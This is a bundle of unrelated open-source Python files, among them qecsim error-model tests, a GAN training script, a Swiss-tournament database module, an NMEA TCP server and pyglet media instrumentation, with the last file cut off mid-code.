FileErrorModel(filename) def test_file_error_model_init_default_parameters(): FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl')) # no error raised def test_file_error_model_init_extra_header(): fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl')) assert fem.bias == 10 @pytest.mark.parametrize('filename', [ os.path.join(FILES_DIR, 'invalid-extra-header-1.jsonl'), os.path.join(FILES_DIR, 'invalid-extra-header-2.jsonl'), os.path.join(FILES_DIR, 'invalid-extra-header-3.jsonl'), os.path.join(FILES_DIR, 'invalid-extra-header-4.jsonl'), ]) def test_file_error_model_init_invalid_extra_headers(filename): with pytest.raises(ValueError): FileErrorModel(filename) def test_file_error_model_probability_distribution(): fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl')) pd = fem.probability_distribution(fem._probability) assert isinstance(pd, tuple) assert len(pd) == 4 assert pd[0] + pd[1] + pd[2] + pd[3] == 1 def test_file_error_model_generate(): fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl')) fqc = FiveQubitCode() for _ in range(10): error = fem.generate(fqc, 0.4) assert isinstance(error, np.ndarray) assert len(error) == 10 def test_file_error_model_generate_skip_to_start(): print() fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 4) fqc = FiveQubitCode() packed_errors = ( pt.pack(fem.generate(fqc, 0.4)), pt.pack(fem.generate(fqc, 0.4)), pt.pack(fem.generate(fqc, 0.4)), ) expected_packed_errors = (("8400", 10), ("5280", 10), ("1080", 10)) assert packed_errors == expected_packed_errors @pytest.mark.parametrize('filename', [ os.path.join(FILES_DIR, 'invalid_line1.jsonl'), os.path.join(FILES_DIR, 'invalid_line2.jsonl'), os.path.join(FILES_DIR, 'invalid_line3.jsonl'), os.path.join(FILES_DIR, 'repeated_dic_key.jsonl'), os.path.join(FILES_DIR, 'invalid_structure1.jsonl'), os.path.join(FILES_DIR, 'invalid_structure2.jsonl'), os.path.join(FILES_DIR, 'no_prob_in_header.jsonl'), os.path.join(FILES_DIR, 'no_label_in_header.jsonl'), ]) def test_file_error_model_invalid_file_header(filename): with pytest.raises(ValueError): FileErrorModel(filename) def test_file_error_model_probability_distribution_invalid_probability_parameter(): fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl')) with pytest.raises(ValueError): fem.probability_distribution(0.3) def test_file_error_model__probability_distribution_no_probability_distribution_in_header(): fem = FileErrorModel(os.path.join(FILES_DIR, 'no_probability_distribution.jsonl')) with pytest.raises(ValueError): fem.probability_distribution(0.4) def test_file_error_model_generate_invalid_probability_parameter(): fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl')) fqc = FiveQubitCode() with pytest.raises(ValueError): fem.generate(fqc, 0.3) def test_file_error_model_generate_invalid_error_lines(): fem = FileErrorModel(os.path.join(FILES_DIR, 'header_lines_after_body_lines.jsonl')) fqc = FiveQubitCode() with pytest.raises(ValueError): fem.generate(fqc, 0.4) fem.generate(fqc, 0.4) def test_file_error_model_generate_no_more_errors_available(): fem = FileErrorModel(os.path.join(FILES_DIR, 'no_more_errors_available.jsonl')) fqc = FiveQubitCode() with pytest.raises(EOFError): fem.generate(fqc, 0.4) fem.generate(fqc, 0.4) fem.generate(fqc, 0.4) def test_file_error_model_generate_no_more_errors_available_skip_to_start(): fem = FileErrorModel(os.path.join(FILES_DIR, 'no_more_errors_available.jsonl'), 1) fqc = FiveQubitCode() with pytest.raises(EOFError): fem.generate(fqc, 0.4) fem.generate(fqc, 0.4) @pytest.mark.parametrize('filename', [ os.path.join(FILES_DIR, 'incorrect_length_in_packed_error.jsonl'), os.path.join(FILES_DIR, 'incorrect_length_in_packed_error2.jsonl') ]) def test_file_error_model_generate_incorrect_length_in_packed_error(filename): fem = FileErrorModel(filename) fqc = FiveQubitCode() with pytest.raises(ValueError): fem.generate(fqc, 0.4) # TESTS FOR GENERATED SAMPLES BELOW @pytest.mark.parametrize('code, filename, decoder', [ (RotatedPlanarCode(5, 5), os.path.join(FILES_DIR, 'rotated_planar_code_size_5_J_0.1_p_2.jsonl'), RotatedPlanarMPSDecoder(chi=8)), (RotatedPlanarCode(5, 5), os.path.join(FILES_DIR, 'rotated_planar_code_size_5_J_0.1_p_4.jsonl'), RotatedPlanarMPSDecoder(chi=8)), (RotatedPlanarCode(5, 5), os.path.join(FILES_DIR, 'rotated_planar_code_size_5_J_0.1_p_6.jsonl'), RotatedPlanarMPSDecoder(chi=8)), ]) def test_file_error_model_generated_sample_error_probability(code, filename, decoder): with CliRunner().isolated_filesystem(): # isolate from logging_qecsim.ini # error model and probability from sample error_model = FileErrorModel(filename, start=1000) e_prob = error_model._probability # runs (repeat many times to ensure physical_error_rate is close to error_probability) max_runs = 100 data = app.run(code, error_model, decoder, e_prob, max_runs) # no error raised p_rate = data['physical_error_rate'] p_var = data['error_weight_pvar'] / (data['n_k_d'][0] ** 2) # physical_error_rate_pvar (power of 2 is correct) p_std = math.sqrt(p_var) # physical_error_rate_std assert p_rate - p_std < e_prob < p_rate + p_std, ( 'physical_error_rate={} is not within 1 std={} of error_probability={}'.format(p_rate, p_std, e_prob))
38.761658
119
0.730918
b9579098cdd1fea8e338f54a90889cf5d220e683
829
py
Python
nlu/components/classifiers/multi_classifier/multi_classifier.py
UPbook-innovations/nlu
2ae02ce7b6ca163f47271e98b71de109d38adefe
[ "Apache-2.0" ]
1
2021-05-01T01:23:18.000Z
2021-05-01T01:23:18.000Z
nlu/components/classifiers/multi_classifier/multi_classifier.py
sheerinZ/nlu
a223eee4b077a6b832f47e5e6125167fe0922687
[ "Apache-2.0" ]
2
2021-09-28T05:55:05.000Z
2022-02-26T11:16:21.000Z
nlu/components/classifiers/multi_classifier/multi_classifier.py
atdavidpark/nlu
619d07299e993323d83086c86506db71e2a139a9
[ "Apache-2.0" ]
1
2021-09-13T10:06:20.000Z
2021-09-13T10:06:20.000Z
import nlu.pipe_components import sparknlp from sparknlp.annotator import * class MultiClassifier: @staticmethod def get_default_model(): return MultiClassifierDLModel.pretrained() \ .setInputCols("sentence_embeddings") \ .setOutputCol("category") @staticmethod def get_pretrained_model(name, language): return MultiClassifierDLModel.pretrained(name,language) \ .setInputCols("sentence_embeddings") \ .setOutputCol("multi_category") @staticmethod def get_default_trainable_model(): return MultiClassifierDLApproach() \ .setInputCols("sentence_embeddings") \ .setOutputCol("multi_category") \ .setLabelColumn("y") \ .setEnableOutputLogs(True) \ .setMaxEpochs(2) \
28.586207
65
0.652593
ff8b6c1575ed131d073caed9b536724f74da7cb3
72
py
Python
quiz/main.py
bschandramohan/PyConnect
bfd5acc13b5fd5a83be14706032be2cf70d4d05a
[ "MIT" ]
1
2021-10-11T04:34:25.000Z
2021-10-11T04:34:25.000Z
quiz/main.py
bschandramohan/PyConnect
bfd5acc13b5fd5a83be14706032be2cf70d4d05a
[ "MIT" ]
null
null
null
quiz/main.py
bschandramohan/PyConnect
bfd5acc13b5fd5a83be14706032be2cf70d4d05a
[ "MIT" ]
null
null
null
from quiz.quiz_game import QuizGame game = QuizGame() game.play_game()
14.4
35
0.777778
3ee1234f52d2b19e1dbfe176ee3d32b5b789f2b8
5,078
py
Python
src/gan_training.py
saattrupdan/gan
68443884c7b4cf2527254d63145549de1f4ae525
[ "MIT" ]
null
null
null
src/gan_training.py
saattrupdan/gan
68443884c7b4cf2527254d63145549de1f4ae525
[ "MIT" ]
null
null
null
src/gan_training.py
saattrupdan/gan
68443884c7b4cf2527254d63145549de1f4ae525
[ "MIT" ]
null
null
null
import torch from torch import nn from torch import optim from torch.utils.data import DataLoader from torch.utils.data import TensorDataset from torch.utils.tensorboard import SummaryWriter import itertools as it from pathlib import Path from tqdm.auto import tqdm from typing import Union import os import time from models import RGAN def train_gan(gan: RGAN, dataloader: DataLoader, lr: float = 3e-4, lr_reduction_factor: float = 1., lr_reduction_step: int = 10, l2_reg: float = 0., optimiser: type = optim.AdamW, epochs: Union[int, None] = None, model_name: str = 'walmart_gan', datadir: str = '.data', random_seed: int = 42, tensorboard_run: str = 'loss') -> RGAN: # Set random seed if random_seed is not None: torch.manual_seed(random_seed) # Initialise tensorboard writer= SummaryWriter() os.system('tensorboard --logdir runs &') time.sleep(4) # Set up optimiser and scheduler for the critic c_optim = optimiser(gan.crt.parameters(), lr = lr) c_sched = optim.lr_scheduler.StepLR( c_optim, step_size = lr_reduction_step, gamma = lr_reduction_factor ) # Set up optimiser and scheduler for the generator g_optim = optimiser(gan.gen.parameters(), lr = lr) g_sched = optim.lr_scheduler.StepLR( g_optim, step_size = lr_reduction_step, gamma = lr_reduction_factor ) epoch_it = it.count() if epochs is None else range(epochs) for epoch in epoch_it: avg_c_loss, avg_g_loss = 0, 0 with tqdm(total = len(dataloader) * dataloader.batch_size, desc = f'Epoch {epoch:3}') as pbar: for idx, reals in enumerate(dataloader): # [batch_size, seq_len] -> [seq_len, batch_size, 1] reals = reals[0].transpose(0, 1).unsqueeze(2) # Get the batch size and sequence length of the batch seq_len, batch_size, _ = reals.shape ########################## ### Train the critic ### ########################## # Compute Wasserstein loss c_optim.zero_grad() noise = torch.randn_like(reals) c_loss = torch.mean(gan(noise) - gan.crt(reals)) # Add an l2 regularisation term norms = torch.FloatTensor([torch.norm(p) for p in gan.crt.parameters()]) c_loss += l2_reg * (norms ** 2).sum() # Compute average loss for logging avg_c_loss += float(c_loss) / len(dataloader) # Backprop gradients c_loss.backward() c_optim.step() ############################# ### Train the generator ### ############################# # Compute Wasserstein loss g_optim.zero_grad() noise = torch.randn_like(reals) g_loss = -torch.mean(gan(noise)) # Compute average loss for logging avg_g_loss += float(g_loss) / len(dataloader) # Backprop gradients g_loss.backward() g_optim.step() # Update progress bar pbar.update(dataloader.batch_size) # Add to tensorboard metrics = {'gen': float(g_loss), 'crt': float(c_loss)} niter = epoch * len(dataloader) + (idx + 1) writer.add_scalars(tensorboard_run, metrics, niter) # Update learning rate schedulers c_sched.step() g_sched.step() # Logging pbar.set_description(\ f'Epoch {epoch:3} - '\ f'crt_loss {avg_c_loss:.3f} - '\ f'gen_loss {avg_g_loss:.3f}' ) # Save model path = Path.cwd().parent / datadir / f'{model_name}.zip' scripted_gan = torch.jit.script(gan) scripted_gan.save(str(path)) writer.close() os.system('killall -9 tensorboard') if __name__ == '__main__': from data_prep import load_hdf import matplotlib.pyplot as plt hdf = load_hdf() X = torch.FloatTensor(hdf['X']) dataset = TensorDataset(X) dataloader = DataLoader(dataset, batch_size = 32, shuffle = True) SEED = 42 gan = RGAN(gen_dim = 256, crt_dim = 64, random_seed = SEED) train_gan(gan, dataloader, random_seed = SEED)#, l2_reg = 0.1, #lr_reduction_factor = 0.9, lr_reduction_step = 10) #with torch.no_grad(): # gan = torch.jit.load('../.data/walmart_gan.zip') # noise = torch.randn(143, 10, 1) # fakes = gan(noise).squeeze().transpose(0, 1) #rnds = torch.randint(0, X.size(0), (10,)) #reals = X[rnds, :] #xs = torch.arange(X.shape[1]) #plt.figure(figsize = (10, 5)) #for real in reals: # plt.plot(xs, real) #plt.show() #for fake in fakes: # plt.plot(xs, fake) # plt.show()
31.153374
70
0.553564
3ac6e2c853542d474ca9657e6b4eb7cb2c6c0546
10,312
py
Python
tournament/tournament.py
singh-pratyush96/tournament-udacity
de895cf00b4799fe4193f38c30d8e0501fd95b68
[ "MIT" ]
null
null
null
tournament/tournament.py
singh-pratyush96/tournament-udacity
de895cf00b4799fe4193f38c30d8e0501fd95b68
[ "MIT" ]
null
null
null
tournament/tournament.py
singh-pratyush96/tournament-udacity
de895cf00b4799fe4193f38c30d8e0501fd95b68
[ "MIT" ]
null
null
null
#!/usr/bin/env python # # tournament.py -- implementation of a Swiss-system tournament # import psycopg2 from random import shuffle def connect(): """ Connect to the PostgreSQL database. Returns a database connection and corresponding cursor. """ connection = psycopg2.connect("dbname=tournament") cursor = connection.cursor() return connection, cursor def existsPlayer(pid): """ Check if a player exists Args: pid: Player ID Returns: Status """ conn, cur = connect() sql = 'select count(*) from players where pid = %s;' cur.execute(sql, (pid,)) result = cur.fetchall()[0][0] == 1 conn.close() return result def existsTournament(tournamentid): """ Check if a tournament exists Args: tournamentid: Tournament ID Returns: Status """ conn, cur = connect() sql = 'select count(*) from tournaments where tid = %s;' cur.execute(sql, (tournamentid,)) result = cur.fetchall()[0][0] == 1 conn.close() return result def existsTournamentPlayer(tournamentid, pid): """ Check if a player is registered for a tournament Args: tournamentid: Tournament ID pid: Player ID Returns: Status """ conn, cur = connect() sql = 'select count(*) from tournamentplayers where tid = %s and pid = %s;' cur.execute(sql, (tournamentid, pid)) result = cur.fetchall()[0][0] == 1 conn.close() return result def deleteMatches(tournamentid=-1): """ Remove all the match records from the database for a tournament. If no argument is passed, delete all matches from all tournament. Args: tournamentid (int): ID of tournament of which matches are to be cleared If no argument passed, reset all matches Returns: Status """ conn, cur = connect() if tournamentid == -1: # If no argument passed sql = 'update tournamentplayers set wins = DEFAULT,' \ ' matches = DEFAULT, lastoppid = default;' cur.execute(sql) else: if not existsTournament(tournamentid): conn.close() return False sql = 'update tournamentplayers set wins = DEFAULT,' \ ' matches = DEFAULT, lastoppid = default where tid = %s;' cur.execute(sql, (tournamentid,)) conn.commit() conn.close() return True def deleteTournamentPlayers(tournamentid=-1): """ Remove all the player records from the database. Args: tournamentid (int): Tournament ID of which players are to be deleted. If no argument passed, delete for all tournaments Returns: Status """ conn, cur = connect() if tournamentid == -1: # If no argument passed sql = 'delete from tournamentplayers;' else: if not existsTournament(tournamentid): conn.close() return False sql = 'delete from tournamentplayers where tid = %s;' cur.execute(sql, (tournamentid,)) conn.commit() conn.close() return True def countTournamentPlayers(tournamentid=-1): """Returns the number of players currently registered. Args: tournamentid (int): Tournament ID to count players. If no argument, count players participated in any tournament Returns: Status, count of players """ conn, cur = connect() # Get count of rows in player relation if tournamentid == -1: sql = 'select count(distinct pid) from tournamentplayers;' cur.execute(sql) else: if not existsTournament(tournamentid): conn.close() return False, -1 sql = 'select count(distinct pid) from tournamentplayers ' \ 'where tid = %s;' cur.execute(sql, (tournamentid,)) player_count = cur.fetchall()[0][0] conn.close() return True, player_count def playerCount(): """ Count all players, whether registered or not Returns: Number of players """ conn, cur = connect() sql = 'select count(*) from players;' cur.execute(sql) count = cur.fetchall()[0][0] conn.close() return count def registerPlayer(name): """Adds a player to the tournament database. The database assigns a unique serial id number for the player. (This should be handled by your SQL database schema, not in your Python code.) Args: name: the player's full name (need not be unique). Returns: ID of registered player """ conn, cur = connect() sql = 'insert into players (pname) values (%s) returning pid;' cur.execute(sql, (name,)) pid = cur.fetchall()[0][0] conn.commit() conn.close() return pid def playerStandings(tournamentid=-1): """Returns a list of the players and their win records, sorted by wins. The first entry in the list should be the player in first place, or a player tied for first place if there is currently a tie. Returns: A list of tuples, each of which contains (id, name, wins, matches): id: the player's unique id (assigned by the database) name: the player's full name (as registered) wins: the number of matches the player has won matches: the number of matches the player has played Returns: Status, list of tuples """ conn, cur = connect() if tournamentid == -1: sql = 'select * from all_tournament_player_stats;' cur.execute(sql) list1 = cur.fetchall() else: if not existsTournament(tournamentid): conn.close() return False, [] sql = 'select pid, pname, wins, matches from tournament_players_stats' \ ' where tid = %s;' cur.execute(sql, (tournamentid,)) list1 = cur.fetchall() conn.close() return True, list1 def clearPlayers(): """ Delete all players """ conn, cur = connect() sql = 'delete from players; delete from tournamentplayers;' cur.execute(sql) conn.commit() conn.close() def reportMatch(tournamentid, winner, loser): """ Report result of match. winner and loser are same in case of a 'bye' Args: tournamentid: Tournament ID winner: Winner ID loser: Loser ID Returns: Status """ conn, cur = connect() if not existsTournamentPlayer(tournamentid, winner) or \ not existsTournamentPlayer(tournamentid, loser): conn.close() return False sql = 'update tournamentplayers set matches = matches + 1,' \ ' wins = wins + 1, lastoppid = %s where tid = %s and pid = %s;' cur.execute(sql, (loser, tournamentid, winner)) if winner != loser: # If not a bye sql = 'update tournamentplayers set matches = matches + 1,' \ ' lastoppid = %s where tid = %s and pid = %s;' cur.execute(sql, (winner, tournamentid, loser)) conn.commit() conn.close() def swissPairings(tournamentid): """ Returns a list of pairs of players for the next round of a match. Assuming that there are an even number of players registered, each player appears exactly once in the pairings. Each player is paired with another player with an equal or nearly-equal win record, that is, a player adjacent to him or her in the standings. Returns: A list of tuples, each of which contains (id1, name1, id2, name2) id1: the first player's unique id name1: the first player's name id2: the second player's unique id name2: the second player's name """ conn, cur = connect() sql = 'select pid, pname, lastoppid from tournament_players_stats' \ ' where tid = %s;' cur.execute(sql, (tournamentid,)) players = cur.fetchall() # Odd players, bye one who wasn't byed last time if len(players) % 2 == 1: tempList = list(players) shuffle(tempList) byed = False randomFirst = tempList[0] while not byed and len(tempList) > 0: if tempList[0][0] == tempList[0][2]: players.remove(tempList[0]) reportMatch(tournamentid, tempList[0][0], tempList[0][0]) byed = True tempList.remove(tempList[0]) if not byed: reportMatch(tournamentid, randomFirst[0], randomFirst[0]) players.remove(randomFirst) # Arrange players, no rematch pairs = [] while len(players) > 2: # No. of players will always be odd player1 = players[0] player2 = players[1] if player1[2] == player2[0]: player2 = players[2] players.remove(player1) players.remove(player2) pairs.append((player1[0], player1[1], player2[0], player2[1])) # Add remaining two players pairs.append((players[0][0], players[0][1], players[1][0], players[1][1])) conn.close() return pairs def addTournament(name): """ Register a new tournament Args: name: Name of tournament Returns: ID of tournament added """ conn, cur = connect() sql = 'insert into tournaments (tname) values(%s) returning tid;' cur.execute(sql, (name,)) tid = cur.fetchall()[0][0] conn.commit() conn.close() return tid def addPlayerTournament(tid, pid): """ Add a registered player to a tournament Args: tid: Tournament ID pid: Player ID Returns: Status """ if not existsTournament(tid) or not existsPlayer(pid): return False conn, cur = connect() sql = 'insert into tournamentplayers (tid, pid) values (%s, %s);' cur.execute(sql, (tid, pid)) conn.commit() conn.close() return True def countTournaments(): """ Count number of tournaments Returns: Number of tournaments """ conn, cur = connect() sql = 'select count(*) from tournaments;' cur.execute(sql) count = cur.fetchall()[0][0] conn.close() return count def clearTournaments(): """ Delete all tournaments """ conn, cur = connect() sql = 'delete from tournamentplayers; delete from tournaments;' cur.execute(sql) conn.commit() conn.close()
25.715711
80
0.610357
b58cc492945714d0d8b1ebe20efb2cf75f90fb40
3,032
py
Python
src/vanchor/devices/nmea_net.py
AlexAsplund/Vanchor
cb5d1c95567ab9d9bd280e2ca3022e4a2da1fa67
[ "MIT" ]
12
2021-09-25T01:03:31.000Z
2022-02-04T09:13:00.000Z
src/vanchor/devices/nmea_net.py
AlexAsplund/Vanchor
cb5d1c95567ab9d9bd280e2ca3022e4a2da1fa67
[ "MIT" ]
13
2021-09-20T19:56:50.000Z
2022-01-10T13:08:32.000Z
src/vanchor/devices/nmea_net.py
AlexAsplund/Vanchor
cb5d1c95567ab9d9bd280e2ca3022e4a2da1fa67
[ "MIT" ]
1
2021-10-05T10:49:59.000Z
2021-10-05T10:49:59.000Z
import socketserver from threading import Thread class NmeaNet: def __init__(self, main): self.main = main self.logger = main.logging.getLogger(self.__class__.__name__) self.emitter = main.event.emitter self.main.work_manager.start_worker(self.start) def start(self, main): self.logger.info("Starting NmeaNet server") host = "0.0.0.0" port = 10000 self.server = NmeaNetServer((host, port), NmeaTCPHandler, nmea_net=self) self.server.serve_forever() class NmeaTCPHandler(socketserver.BaseRequestHandler): def __init__(self, nmea_net, *args, **kwargs): self.main = nmea_net.main self.logger = self.main.logging.getLogger(self.__class__.__name__) self.emitter = self.main.event.emitter super().__init__(*args, **kwargs) def send_event(self, message): self.logger.info("Sending NMEA") msg = message[0] self.request.sendall(bytes(msg, "utf-8")) def handle(self): while 1: try: rec = self.request.recv(1024) try: self.data = rec.decode("ascii") except: self.data = rec.decode("utf-8") self.data.replace("\r\n", "") if self.data and self.data[0] == "$": self.logger.info("Sending raw NMEA message: {}".format(self.data)) self.emitter.emit("nmea.parse", self.data) elif self.data == "" or self.data == "\r\n": None else: self.logger.info( "Invalid data received: {} | {}".format(self.data, rec) ) self.request.sendall(bytes(f"ERROR: Invalid data\r\n", "ascii")) except Exception as e: self.logger.warning("Failed to process message", e) def finish(self): self.logger.debug("{}".format(self.client_address)) return socketserver.BaseRequestHandler.finish(self) class NmeaNetServer(socketserver.TCPServer): def __init__(self, *args, nmea_net, **kwargs): super().__init__(*args, **kwargs) self.nmea_net = nmea_net self.main = nmea_net.main self.logger = self.main.logging.getLogger(self.__class__.__name__) self.emitter = self.main.event.emitter def finish_request(self, request, client_address): """Finish one request by instantiating RequestHandlerClass.""" self.logger.info("{} request finished".format(client_address[0])) self.RequestHandlerClass(self.nmea_net, request, client_address, self) def verify_request(self, request, client_address): self.logger.debug("verify_request(%s, %s)", request, client_address) return socketserver.TCPServer.verify_request( self, request, client_address, )
36.095238
87
0.573219
f4eaa4061bfed62c1da74b49767bf9af46595249
12,597
py
Python
pyglet/media/instrumentation.py
SwineProject/pyglet
f0203870bef94d4349ad16f060c941d45270a0b5
[ "BSD-3-Clause" ]
null
null
null
pyglet/media/instrumentation.py
SwineProject/pyglet
f0203870bef94d4349ad16f060c941d45270a0b5
[ "BSD-3-Clause" ]
null
null
null
pyglet/media/instrumentation.py
SwineProject/pyglet
f0203870bef94d4349ad16f060c941d45270a0b5
[ "BSD-3-Clause" ]
null
null
null
# ---------------------------------------------------------------------------- # pyglet # Copyright (c) 2006-2018 Alex Holkner # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # * Neither the name of pyglet nor the names of its # contributors may be used to endorse or promote products # derived from this software without specific prior written # permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ---------------------------------------------------------------------------- """ Responsabilities Defines the events that modify media_player state Defines which events are potential defects Gives the low level support to extract info from the recorded data For new code here, keep accepting and returning only data structures, never paths or files. """ # events definition mp_events = { "version": 1.1, # <evname>: { # "desc": <description used in reports to mention the event>, # "update_names": <list of names of fields updated>, # "other_fields": <list of additionals fields to show when mention the # event in a report> # }, "crash": { "desc": "media_player crashed.", "update_names": ["evname", "sample"], "other_fields": [], "test_cases": [("crash", "small.mp4")] }, "mp.im": { "desc": "Play", "update_names": ["evname", "sample"], "other_fields": [], "test_cases": [("mp.im", 3, "small.mp4")] }, "p.P._sp": { "desc": "Start playing", "update_names": ["evname", "wall_time"], "other_fields": [], "test_cases": [("p.P._sp", 1.23)] }, "p.P.sk": { "desc": "Seek", "update_names": ["evname", "seek_to_time"], "other_fields": [], "test_cases": [("p.P.sk", 1.23), ("p.P.sk", None)] }, "p.P.ut.1.0": { "desc": "Enter update_texture", "update_names": ["evname", "pyglet_dt", "current_time", "audio_time", "wall_time"], "other_fields": [], "test_cases": [("p.P.ut.1.0", 0.02, 2.31, 2.28, 1.21), ("p.P.ut.1.0", 0.02, None, 2.28, 1.21), ("p.P.ut.1.0", None, 2.31, 2.28, 1.21)] }, "p.P.ut.1.5": { "desc": "Discard video frame too old,", "update_names": ["evname", "video_time"], "other_fields": ["current_time"], "test_cases": [("p.P.ut.1.5", 1.21)] }, "p.P.ut.1.6": { "desc": "Current video frame,", "update_names": ["evname", "video_time"], "other_fields": [], "test_cases": [("p.P.ut.1.6", 1.21)] }, "p.P.ut.1.7": { "desc": "Early return doing nothing because video_time is None (likely EOV),", "update_names": ["evname", "rescheduling_time"], "other_fields": [], "test_cases": [("p.P.ut.1.7", 0.02)] }, "p.P.ut.1.8": { "desc": "Image frame is None (?)", "update_names": ["evname"], "other_fields": [], "test_cases": [("p.P.ut.1.8",)] }, # in log_render_anomalies list only if rescheduling_time < 0 "p.P.ut.1.9": { "desc": "Re-scheduling,", "update_names": ["evname", "rescheduling_time", "next_video_time"], "other_fields": [], "test_cases": [("p.P.ut.1.9", 0.02, None), ("p.P.ut.1.9", 0.02, 2.7)] }, # crash_detection relies in this being the last event in the log_entries "p.P.oe": { "desc": ">>> play ends", "update_names": ["evname"], "other_fields": [], "test_cases": [("p.P.oe",)] }, } # events to examine for defects detection mp_bads = {"crash", "p.P.ut.1.5", "p.P.ut.1.7", "p.P.ut.1.8"} class MediaPlayerStateIterator(object): """Exposes for analysis the sequence of media_player states Typical use mp_states = MediaPlayerStateIterator() for st in mp_states: do something with st, the current media_player state. If desired a callback can be called just before processing an event, the signature is fn_pre_event(event, state_before_event) The mp state is handled as a dict, with keys in cls.fields """ fields = { # real "evname": None, "evnum": -1, # synthetic, ordinal last event processed "sample": None, "wall_time": None, "current_time": None, "audio_time": None, "seek_to_time": None, "pyglet_dt": None, "video_time": None, "rescheduling_time": None, "next_video_time": None, # synthetics, probably invalid after using seek "pyglet_time": 0, "frame_num": 0, } def __init__(self, recorded_events, events_definition=mp_events, fn_pre_event=None): self.fn_pre_event = fn_pre_event self.state = dict(self.fields) self.events_definition = events_definition self.iter_events = iter(recorded_events) version_args = next(self.iter_events) assert version_args == ("version", self.events_definition["version"]) def __iter__(self): return self def __next__(self): event = next(self.iter_events) if self.fn_pre_event is not None: self.fn_pre_event(event, self.state) event_dict = self.event_as_dict(event) self.update(event_dict) return self.state def event_as_dict(self, event): names = self.events_definition[event[0]]["update_names"] updated = {a: b for a, b in zip(names, event)} return updated def update(self, event_dict): self.state.update(event_dict) self.state["evnum"] += 1 evname = event_dict["evname"] if evname == "p.P.ut.1.0": self.state["pyglet_time"] += event_dict["pyglet_dt"] elif evname == "p.P.ut.1.5" or evname == "p.P.ut.1.9": self.state["frame_num"] += 1 class TimelineBuilder(object): """At each call to player.Player.update_texture we capture selected player state, before accepting the changes in the event. This is the same as capturing the state at the end of previous update call. Output is a sequence of tuples capturing the desired fields. Meant to extract info on behalf of other sw, especially visualization. """ def __init__(self, recorded_events, events_definition=mp_events): mp = MediaPlayerStateIterator(recorded_events, events_definition, self.pre) self.mp_state_iterator = mp self.timeline = [] def pre(self, event, st): if event[0] == "p.P.ut.1.0": p = (st["wall_time"], st["pyglet_time"], st["audio_time"], st["current_time"], st["frame_num"], st["rescheduling_time"]) self.timeline.append(p) def get_timeline(self): """remember video_time and audio_time can be None""" # real work is done in rhe callback pre for st in self.mp_state_iterator: pass # The first entry is bogus, because there was no previous call so discard return self.timeline[1:] def timeline_postprocessing(timeline): """ Eliminates Nones in timeline so other software don't error. Extra lists are built for the vars with nones, each list with one point for each None in the form (wall_time, prev_value). """ current_time_nones = [] audio_time_nones = [] old_current_time = 0 old_audio_time = 0 filtered_timeline = [] for wall_time, pt, audio_time, current_time, fnum, rt in timeline: if current_time is None: current_time = old_current_time current_time_nones.append((wall_time, old_current_time)) else: current_time_time = current_time if audio_time is None: audio_time = old_audio_time audio_time_nones.append((wall_time, old_audio_time)) else: old_audio_time = audio_time filtered_timeline.append((wall_time, pt, audio_time, current_time, fnum, rt)) return filtered_timeline, current_time_nones, audio_time_nones # works for buffered log, needs other implementation if unbuffered def crash_detected(recorded_events): crashed = recorded_events[-1][0] != "p.P.oe" return crashed class CountBads(object): """Helper to report anomalies in the media_player states seen when playing a sample. - provides .anomalies_description, a dict <anomaly>: <description> - calling .count_bads(recorded_events) will return a dict of anomaly: <count times anomaly detected> - preprocessing: ad-hoc prefiltering the events stream for noise reduction """ def __init__(self, events_definition=mp_events, bads=mp_bads): self.events_definition = events_definition self.bads = bads self.anomalies_description = self.build_anomalies_description() def build_anomalies_description(self): """builds descriptions for the anomalies""" d = self.events_definition anomalies_description = {evname: d[evname]["desc"] for evname in self.bads} anomalies_description["scheduling_in_past"] = "Scheduling in the past" return anomalies_description def preprocessing(self, recorded_events): """ I see all recordings ending with some potential anomalies in the few frames just before the '>>> play ends'; visually the play is perfect so I assume they are false positives if just at EOF. Deleting the offending events (only if near EOL) to reduce noise in summarize.py """ recorded_events = list(recorded_events) if (len(recorded_events) > 9 and recorded_events[-2][0] == "p.P.ut.1.7" and recorded_events[-6][0] == "p.P.ut.1.7" and recorded_events[-10][0] == "p.P.ut.1.7" ): del recorded_events[-10] del recorded_events[-6] del recorded_events[-2] elif (len(recorded_events) > 6 and recorded_events[-2][0] == "p.P.ut.1.7" and recorded_events[-6][0] == "p.P.ut.1.7" ): del recorded_events[-6] del recorded_events[-2] elif (len(recorded_events) > 2 and recorded_events[-2][0] == "p.P.ut.1.7" ): del recorded_events[-2] return recorded_events def count_bads(self, recorded_events): """returns counts of anomalies as a dict of anomaly: count recorded_events: media_player events recorded while playing a sample Notice that 'counters' has one more key than 'bads': "scheduling_in_past" """ recorded_events = self.preprocessing(recorded_events) counters = {k: 